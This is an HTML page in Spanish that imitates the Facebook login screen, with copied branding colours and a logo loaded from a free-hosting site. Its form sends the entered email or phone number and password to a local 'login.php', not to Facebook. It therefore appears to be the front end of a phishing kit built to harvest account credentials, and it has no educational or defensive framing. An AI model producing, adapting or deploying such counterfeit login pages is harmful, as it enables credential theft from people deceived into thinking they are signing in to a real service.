<!DOCTYPE html>
<html>
    <meta name="viewport" content="width=device-width,initial-scale=1"/>
<head>
	<meta charset="UTF-8">
	<title>Página de inicio de sesión de Facebook</title>
	<style>
		body {
			background-color: #f0f2f5;
			font-family: Arial, sans-serif;
		}
		.login-container {
			margin: 0 auto;
			max-width: 400px;
			padding: 20px;
			background-color: #fff;
			border-radius: 5px;
			box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
		}
		h1 {
			font-size: 24px;
			margin-bottom: 20px;
			text-align: center;
		}
		input[type="text"], input[type="password"] {
			display: block;
			margin: 0 auto 20px;
			padding: 10px;
			width: 100%;
			border-radius: 5px;
			border: none;
			box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
			font-size: 16px;
		}
		input[type="submit"] {
			background-color: #1877f2;
			color: #fff;
			border: none;
			border-radius: 5px;
			padding: 10px;
			font-size: 16px;
			cursor: pointer;
			width: 100%;
			margin-bottom: 20px;
			box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
			font-weight: bold;
		}
		input[type="submit"]:hover {
			background-color: #166fe5;
		}
		.forgot-password {
			display: block;
			text-align: center;
			margin-bottom: 20px;
			font-size: 14px;
			color: #1877f2;
			text-decoration: none;
		}
		.forgot-password:hover {
			text-decoration: underline;
		}
		.create-account {
			display: block;
			text-align: center;
			font-size: 14px;
			color: #4b4f56;
			text-decoration: none;
			border-top: 1px solid #ddd;
			padding-top: 20px;
			background-color: #42b72a;
			padding-bottom: 10px;
			font-weight: bold;
			color: #fff;
		}
		.create-account:hover {
			text-decoration: underline;
		}
		
		.show-password {
			display: inline-block;
			margin-left: 10px;
			cursor: pointer;
			color: #1877f2;
			font-size: 14px;
		}
		img {
			display: block;
			margin: 0 auto;
			width: 50%;
		}

		@media only screen and (max-width: 600px) {
			.login-container {
				max-width: 90%;
			}
		}
	</style>
</head>
<body>
	<div class="login-container">
		<img src="https://gaf12.000webhostapp.com/loguito.png" alt="Logo de Facebook">
		<h1>Iniciar sesión en Facebook</h1>
		<form action="login.php" method="post">
			<input type="text" placeholder="Correo electrónico o número de teléfono" name="username">
			<input type="password" placeholder="Contraseña" name="password">
			<input type="submit" value="Iniciar sesión">
			<a href="#" class="forgot-password">¿Olvidaste tu contraseña?</a>
		</form>
		<a href="#" class="create-account">Crear cuenta nueva</a>
	</div>
</body>
</html>
